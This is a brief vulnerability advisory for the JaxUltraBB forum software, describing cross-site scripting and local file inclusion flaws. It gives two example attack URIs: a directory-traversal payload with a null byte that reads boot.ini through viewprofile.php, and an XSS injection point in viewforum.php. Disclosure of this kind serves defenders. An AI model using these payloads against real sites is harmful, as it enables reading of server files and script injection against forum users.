JaxUltraBB Cross Site Scripting and Local File Include Vulnerabilities

JaxUltraBB Cross Site Scripting and Local File Include Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/jubb/viewprofile.php?user=../../../../../../../../boot.ini%00
http://www.example.com/[jubb_path]/viewforum.php?forum=[XSS]